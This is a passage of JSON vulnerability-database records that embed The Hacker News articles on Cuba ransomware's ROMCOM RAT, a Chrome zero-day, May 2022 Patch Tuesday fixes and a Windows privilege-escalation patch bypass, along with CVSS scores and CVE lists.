"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2022-24521"], "modified": "2022-12-02T13:20:45", "id": "THN:2AE638B06506778A5F779054ACB99CDC", "href": "https://thehackernews.com/2022/12/cuba-ransomware-extorted-over-60.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-12T04:04:28", "description": "[![Cuba Ransomware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjG5NY6z_E3mIqws1GTNFoFKEavt9jBxtciK10htSDSQc_JECqfwKvNTPymBW0axc6McWFzM08_t78ovmJx91jcYFgquWC09fNYVXBMKenTKS08JGIU8VnHvwXEcZdfG0DG9NePAIWwEZN0t1g7Ax2ZaG1fKl6W75RQWiD5ekyGBcApeB74SwA5osWN/s728-e1000/ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjG5NY6z_E3mIqws1GTNFoFKEavt9jBxtciK10htSDSQc_JECqfwKvNTPymBW0axc6McWFzM08_t78ovmJx91jcYFgquWC09fNYVXBMKenTKS08JGIU8VnHvwXEcZdfG0DG9NePAIWwEZN0t1g7Ax2ZaG1fKl6W75RQWiD5ekyGBcApeB74SwA5osWN/s728-e100/ransomware.jpg>)\n\nThreat actors associated with the Cuba ransomware have been linked to previously undocumented tactics, techniques and procedures (TTPs), including a new remote access trojan called **ROMCOM RAT** on compromised systems.\n\nThe [new findings](<https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/>) come from Palo Alto Networks' Unit 42 threat intelligence team, which is tracking the double extortion ransomware group under the [constellation-themed moniker](<https://unit42.paloaltonetworks.com/unit-42-threat-group-naming-update/>) **Tropical Scorpius**.\n\nCuba ransomware (aka [COLDDRAW](<https://www.mandiant.com/resources/unc2596-cuba-ransomware>)), which was first detected in December 2019, reemerged on the threat landscape in November 2021 and has been attributed to attacks against 60 entities in five critical infrastructure sectors, amassing at least $43.9 million in ransom payments.\n\nOf the 60 victims listed on its data leak site, 40 are located in the U.S., indicating a not as global distribution of targeted organizations as other ransomware gangs.\n\n\"Cuba ransomware is distributed through Hancitor malware, a loader known for dropping or executing stealers, such as Remote Access Trojans (RATs) and other types of ransomware, onto victims' networks,\" according to a [December 2021 alert](<https://www.ic3.gov/Media/News/2021/211203-2.pdf>) from the U.S. Federal Bureau of Investigation (FBI).\n\n\"Hancitor malware actors use phishing emails, Microsoft Exchange vulnerabilities, compromised credentials, or legitimate Remote Desktop Protocol (RDP) tools to gain initial access to a victim's network.\"\n\nIn the intervening months, the ransomware operation received substantial upgrades with an aim to \"optimize its execution, minimize unintended system behavior, and provide technical support to the ransomware victims if they choose to negotiate,\" [noted](<https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html>) Trend Micro in June.\n\nChief among the changes encompassed terminating more processes before encryption (viz Microsoft Outlook, Exchange, and MySQL), expanding the file types to be excluded, and revision to its ransom note to offer victim support via quTox.\n\nTropical Scorpius is also believed to share connections with a data extortion marketplace called Industrial Spy, as [reported](<https://www.bleepingcomputer.com/news/security/industrial-spy-data-extortion-market-gets-into-the-ransomware-game/>) by Bleeping Computer in May 2022, with the exfiltrated data following a Cuba ransomware attack posted for sale on the illicit portal instead of its own data leak site.\n\nThe latest updates observed by Unit 42 in May 2022 has to do with the defense evasion tactics employed prior to the deployment of the ransomware to fly under the radar and move laterally across the compromised IT environment.\n\n[![Cuba Ransomware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhhaBChjsAYv4PpKZR25UQ3kDpGAHQ3G4qGVnXq8GGelhND5cDH3UxCWOv2uIEGmZtCmEIs7o_BMLcnlIByriCzFi43Pwsd9Ev2--mNQ8ieosDPxK156gZtGWhqJazdEVZXfbI5oJJsalpaeIG4ypHXkpAWog09JIppeF5_pNWu-zVY1niiteyZNblF/s728-e1000/chart.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhhaBChjsAYv4PpKZR25UQ3kDpGAHQ3G4qGVnXq8GGelhND5cDH3UxCWOv2uIEGmZtCmEIs7o_BMLcnlIByriCzFi43Pwsd9Ev2--mNQ8ieosDPxK156gZtGWhqJazdEVZXfbI5oJJsalpaeIG4ypHXkpAWog09JIppeF5_pNWu-zVY1niiteyZNblF/s728-e100/chart.jpg>)\n\n\"Tropical Scorpius leveraged a dropper that writes a kernel driver to the file system called ApcHelper.sys,\" the company stated. \"This targets and terminates security products. The dropper was not signed, however, the kernel driver was signed using the certificate found in the [LAPSUS$ NVIDIA leak](<https://thehackernews.com/2022/03/hackers-who-broke-into-nvidias-network.html>).\"\n\nThe main task of the kernel driver is to terminate processes associated with security products so as to bypass detection. Also incorporated in the attack chain is a local privilege escalation tool downloaded from a remote server to gain SYSTEM permissions. \n\nThis, in turn, is achieved by triggering an exploit for CVE-2022-24521 (CVSS score: 7.8), a flaw in the Windows Common Log File System (CLFS) that was [patched](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) by Microsoft as a zero-day flaw in April 2022.\n\nThe privilege escalation step is followed by carrying out system reconnaissance and lateral movement activities through tools like ADFind and Net Scan, while also using a ZeroLogon utility that exploits [CVE-2020-1472](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) to gain domain administrator rights.\n\nFurthermore, the intrusion paves the way for the deployment of a novel backdoor called ROMCOM RAT, which is equipped to start a reverse shell, delete arbitrary files, upload data to a remote server, and harvest a list of running processes.\n\nThe remote access trojan, per Unit 42, is said to be under active development, as the cybersecurity firm discovered a second sample uploaded to the VirusTotal database on June 20, 2022.\n\nThe improved variant comes with support for a broadened set of 22 commands, counting the ability to download bespoke payloads to capture screenshots as well as extract a list of all installed applications to send back to the remote server.\n\n\"Tropical Scorpius remains an active threat,\" the researchers said. \"The group's activity makes it clear that an approach to tradecraft using a hybrid of more nuanced tools focusing on low-level Windows internals for defense evasion and local privilege escalation can be highly effective during an intrusion.\n\nThe findings come as emerging ransomware groups such as [Stormous](<https://cloudsek.com/threatintelligence/stormous-ransomware-group-runs-opinion-polls-leaks-intellectual-property-of-indian-companies/>), [Vice Society](<https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/>), [Luna](<https://thehackernews.com/2022/07/new-rust-based-ransomware-family.html>), [SolidBit](<https://medium.com/s2wblog/two-copycats-of-lockbit-ransomware-solidbit-and-crypton-7257fb069b16>), and BlueSky are continuing to proliferate and evolve in the cybercrime ecosystem, at the same using advanced encryption techniques and delivery mechanisms.\n\n[![SolidBit Ransomware Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiMII7rTuz0-pkhQiKNG-tXibaA5dvIeKqjHYEPmsFQDciFG1K40Epz9E4XdSX3mAC1dqyP9wQ42bMnK9kJH0rHe6pPSfG8Z8s1Mwag8HuLMmwh7PcMF3j-sjdl-Xa4TSgUKn872EWArqVk5pQMtn_v7uFF-vdZMXYjcI4YrXgMtKGOEk66z1WFW8mS/s728-e1000/ransomware-malware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiMII7rTuz0-pkhQiKNG-tXibaA5dvIeKqjHYEPmsFQDciFG1K40Epz9E4XdSX3mAC1dqyP9wQ42bMnK9kJH0rHe6pPSfG8Z8s1Mwag8HuLMmwh7PcMF3j-sjdl-Xa4TSgUKn872EWArqVk5pQMtn_v7uFF-vdZMXYjcI4YrXgMtKGOEk66z1WFW8mS/s728-e100/ransomware-malware.jpg>)\n\nSolidBit particularly stands out for its targeting of users of popular video games and social media platforms by masquerading as different applications like League of Legends account checker, Social Hacker, and Instagram Follower Bot, allowing the actors to cast a wide net of potential victims.\n\n\"SolidBit ransomware is compiled using .NET and is actually a variant of [Yashma](<https://thehackernews.com/2022/05/new-chaos-ransomware-builder-variant.html>) ransomware, also known as Chaos,\" Trend Micro [disclosed](<https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html>) in a write-up last week.\n\n\"It's possible that SolidBit's ransomware actors are currently working with the original developer of Yashma ransomware and likely modified some features from the Chaos builder, later rebranding it as SolidBit.\"\n\nBlueSky, for its part, is known to utilize multithreading to encrypt files on the host for faster encryption, not to mention adopt anti-analysis techniques to obfuscate its appearance.\n\nThe ransomware payload, which kicks off with the execution of a PowerShell script retrieved from an attacker-controlled server, also disguises itself as a legitimate Windows application (\"javaw.exe\").\n\n\"Ransomware authors are adopting modern advanced techniques such as encoding and encrypting malicious samples, or using multi-staged ransomware delivery and loading, to evade security defenses,\" Unit 42 [noted](<https://unit42.paloaltonetworks.com/bluesky-ransomware/>).\n\n\"BlueSky ransomware is capable of encrypting files on victim hosts at rapid speeds with multithreaded computation. In addition, the ransomware adopts obfuscation techniques, such as API hashing, to slow down the reverse engineering process for the analyst.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-11T10:21:00", "type": "thn", "title": "Hackers Behind Cuba Ransomware Attacks Using New RAT Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2022-24521"], "modified": "2022-08-12T02:23:42", "id": "THN:D7DBE5ECBAF3E906ECA544B7E150594A", "href": "https://thehackernews.com/2022/08/hackers-behind-cuba-ransomware-attacks.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:26", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhe4kI4fPWEvYG9ia8i9jo4TGUExUqxfVYERYGlXDOHtolech2eDZ1t68Ygq-Rm2KyDOptmayUsQQ8KWRS6YLPsnNM81pe5p-m9VRQ3jW80R7QesFXZ6BrtdfsBk9_pvdaAJUbvRR8si8Ro0mR-XltTDsPJ-2gNPRTn6yVm8yNWyn9cPdTUYrX5TsGA/s728-e100/chrome-update.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhe4kI4fPWEvYG9ia8i9jo4TGUExUqxfVYERYGlXDOHtolech2eDZ1t68Ygq-Rm2KyDOptmayUsQQ8KWRS6YLPsnNM81pe5p-m9VRQ3jW80R7QesFXZ6BrtdfsBk9_pvdaAJUbvRR8si8Ro0mR-XltTDsPJ-2gNPRTn6yVm8yNWyn9cPdTUYrX5TsGA/s728-e100/chrome-update.jpg>)\n\nGoogle on Friday shipped an out-of-band security update to address a high severity vulnerability in its Chrome browser that it said is being actively exploited in the wild.\n\nTracked as [**CVE-2022-1096**](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>), the zero-day flaw relates to a type confusion vulnerability in the V8 JavaScript engine. An anonymous researcher has been credited with reporting the bug on March 23, 2022.\n\nType confusion errors, which arise when a resource (e.g., a variable or an object) is accessed using a type that's incompatible to what was originally initialized, could have serious consequences in languages that are not [memory safe](<https://en.wikipedia.org/wiki/Memory_safety>) like C and C++, enabling a malicious actor to perform out-of-bounds memory access.\n\n\"When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution,\" MITRE's Common Weakness Enumeration (CWE) [explains](<https://cwe.mitre.org/data/definitions/843.html>).\n\nThe tech giant acknowledged it's \"aware that an exploit for CVE-2022-1096 exists in the wild,\" but stopped short of sharing additional specifics so as to prevent further exploitation and until a majority of users are updated with a fix.\n\nCVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year, the first being [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>), a use-after-free vulnerability in the Animation component that was patched on February 14, 2022.\n\nEarlier this week, Google's Threat Analysis Group (TAG) [disclosed](<https://thehackernews.com/2022/03/north-korean-hackers-exploited-chrome.html>) details of a twin campaign staged by North Korean nation-state groups that weaponized the flaw to strike U.S. based organizations spanning news media, IT, cryptocurrency, and fintech industries.\n\nGoogle Chrome users are highly recommended to update to the latest version 99.0.4844.84 for Windows, Mac, and Linux to mitigate any potential threats. Users of Chromium-based browsers such as Microsoft Edge, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-26T02:11:00", "type": "thn", "title": "Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096"], "modified": "2022-03-26T02:11:38", "id": "THN:EC6517AAC0BD5D8BBC4C4D32420CA903", "href": "https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T16:34:05", "description": "[![Patch Tuesday Updates](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMS1eQr1RHrJ4KbCeIAsD8LFjXS1pwaUn-CV_sgwffkJuTbtzEVFzH-MbTDp5Xux8sLeBam6yIiQBAEjbLyQubLgQjrWdabwHSiFTxmW-gozRenj_otXidWxopI20Oyu0nZYzgx96UWaVUcPM0K9d7jbK60XwY_4YW6I6w_mypjEqDN6ua4QOevUEQ/s728-e1000/windows-update-download.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMS1eQr1RHrJ4KbCeIAsD8LFjXS1pwaUn-CV_sgwffkJuTbtzEVFzH-MbTDp5Xux8sLeBam6yIiQBAEjbLyQubLgQjrWdabwHSiFTxmW-gozRenj_otXidWxopI20Oyu0nZYzgx96UWaVUcPM0K9d7jbK60XwY_4YW6I6w_mypjEqDN6ua4QOevUEQ/s728-e100/windows-update-download.jpg>)\n\nMicrosoft on Tuesday rolled out fixes for as many as [74 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-May>), including one for a zero-day bug that's being actively exploited in the wild.\n\nOf the 74 issues, seven are rated Critical, 66 are rated Important, and one is rated low in severity. Two of the flaws are listed as publicly known at the time of release.\n\nThese encompass 24 remote code execution (RCE), 21 elevation of privilege, 17 information disclosure, and six denial-of-service vulnerabilities, among others. The updates are in addition to [36 flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) patched in the Chromium-based Microsoft Edge browser on April 28, 2022.\n\nChief among the resolved bugs is [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (CVSS score: 8.1), a spoofing vulnerability affecting the Windows Local Security Authority ([LSA](<https://docs.microsoft.com/en-us/windows/win32/secauthn/lsa-authentication>)), which Microsoft describes as a \"protected subsystem that authenticates and logs users onto the local system.\"\n\n\"An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using [NTLM](<https://en.wikipedia.org/wiki/NT_LAN_Manager>),\" the company said. \"This security update detects anonymous connection attempts in LSARPC and disallows it.\"\n\nIt's also worth noting that the severity rating of the flaw would be elevated to 9.8 if it were to be chained with [NTLM relay attacks](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) on Active Directory Certificate Services (AD CS) such as [PetitPotam](<https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html>).\n\n\"Being actively exploited in the wild, this exploit allows an attacker to authenticate as approved users as part of an NTLM relay attack - letting threat actors gain access to the hashes of authentication protocols,\" Kev Breen, director of cyber threat research at Immersive Labs, said.\n\nThe two other publicly-known vulnerabilities are as follows -\n\n * [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29972>) (CVSS score: 8.2) - Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver (aka [SynLapse](<https://thehackernews.com/2022/05/microsoft-mitigates-rce-vulnerability.html>))\n * [CVE-2022-22713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22713>) (CVSS score: 5.6) - Windows Hyper-V Denial-of-Service Vulnerability\n\nMicrosoft, which remediated CVE-2022-29972 on April 15, tagged it as \"Exploitation More Likely\" on the Exploitability Index, making it imperative that affected users apply the updates as soon as possible.\n\nAlso patched by Redmond are several RCE bugs in Windows Network File System ([CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>)), Windows LDAP ([CVE-2022-22012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22012>), [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29130>)), Windows Graphics ([CVE-2022-26927](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26927>)), Windows Kernel ([CVE-2022-29133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29133>)), Remote Procedure Call Runtime ([CVE-2022-22019](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22019>)), and Visual Studio Code ([CVE-2022-30129](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30129>)).\n\nCyber-Kunlun, a Beijing-based cybersecurity company, has been credited with reporting [30 of the 74 flaws](<https://twitter.com/mj0011sec/status/1524083750400708609>), counting CVE-2022-26937, CVE-2022-22012, and CVE-2022-29130.\n\nWhat's more, CVE-2022-22019 follows an incomplete patch for [three RCE vulnerabilities](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>) in the Remote Procedure Call (RPC) runtime library \u2014 CVE-2022-26809, CVE-2022-24492, and CVE-2022-24528 \u2014 that were addressed by Microsoft in April 2022.\n\nExploiting the flaw would allow a remote, unauthenticated attacker to execute code on the vulnerable machine with the privileges of the RPC service, Akamai [said](<https://www.akamai.com/blog/security/rpc-runtime-patch-tuesday-take-two>).\n\nThe Patch Tuesday update is also notable for resolving two privilege escalation ([CVE-2022-29104](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29104>) and [CVE-2022-29132](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29132>)) and two information disclosure ([CVE-2022-29114](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29114>) and [CVE-2022-29140](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29140>)) vulnerabilities in the Print Spooler component, which has long posed an attractive target for attackers. \n\n### Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://thehackernews.com/2022/05/google-releases-android-update-to-patch.html>)\n * [Cisco](<https://thehackernews.com/2022/05/cisco-issues-patches-for-3-new-flaws.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/05/stable-channel-update-for-desktop_10.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/May-2022>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T05:29:00", "type": "thn", "title": "Microsoft Releases Fix for New Zero-Day with May 2022 Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22012", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-26927", "CVE-2022-26937", "CVE-2022-29104", "CVE-2022-29114", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29140", "CVE-2022-29972", "CVE-2022-30129"], "modified": "2022-05-11T16:06:59", "id": "THN:6F5BF10AC5A30E497851C9ADE15C774A", "href": "https://thehackernews.com/2022/05/microsoft-releases-fix-for-new-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:52", "description": "[![Microsoft Windows 10](https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[![Microsoft Windows 10](https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", 